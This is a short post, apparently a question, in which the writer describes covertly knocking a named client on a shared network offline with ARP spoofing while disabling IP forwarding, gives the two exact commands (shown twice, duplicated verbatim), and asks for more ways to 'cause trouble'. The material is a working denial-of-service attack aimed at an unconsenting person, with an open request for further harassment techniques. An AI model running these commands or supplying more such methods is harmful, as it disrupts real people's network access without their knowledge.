On the same network, I can use kali to enter the following two commands to prevent client 192.168.8.2 from accessing the Internet. And it won't attract their attention. Are there any other ways to cause trouble?
I will deceive the target 192.168.8.2 and say: I am a router, and I will forward your request for you. Then I set /proc/sys/net/ipv4/ip_forward to "0", which means discarding its request.
echo 0 > /proc/sys/net/ipv4/ip_forward
arpspoof -i wlan0 -t 192.168.8.2 -r 192.168.8.1
I will deceive the target 192.168.8.2 and say: I am a router, and I will forward your request for you. Then I set /proc/sys/net/ipv4/ip_forward to "0", which means discarding its request.
echo 0 > /proc/sys/net/ipv4/ip_forward
arpspoof -i wlan0 -t 192.168.8.2 -r 192.168.8.1